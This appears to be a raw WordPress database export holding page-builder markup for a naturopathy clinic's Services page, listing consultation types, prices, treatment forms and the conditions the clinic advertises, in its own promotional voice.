custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\" width=\"100%\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]\n\n<span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.\n\n \n\n[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]\n<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]\n<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span>\n\n[/et_pb_text][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:shortcode -->\n[et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span>\nCapsules/tablets\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row]\n<!-- /wp:shortcode -->\n\n<!-- wp:paragraph -->\n<p>[et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]</p>\n<!-- /wp:paragraph -->','Services','','inherit','closed','closed','','424-revision-v1','','','2025-04-01 19:55:09','2025-04-01 11:55:09','',424,'https://verdenaturopathy.com.au/?p=426',0,'revision','',0),(417,1,'2025-03-14 13:55:40','2025-03-14 05:55:40','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" custom_padding=\"||27px|||\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>digestive issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep, emotional imbalance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>women\'s health (PCOS, endometriosis, PMS, menopause, hormonal imbalance, infertility)</span></span><br /><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>skin health (acne, eczema/dermatitis, rosacea)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer a complimentary 15-min chat to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" title_text=\"IMG_20210701_202413_037\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (60 min) - $185\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up (30 min) - $90\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $65\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span> Existing clients only.<span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" title_text=\"5-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Flower essence consult (30 min) - $85\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A consult devoted to your emotional wellbeing. Flower essences are a form of energetic medicine used to assist with working through negative beliefs, stress or trauma. Flower essences are gentle and supportive in nature making them perfect for children too. Consult includes a 25ml customised essence. </span><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" 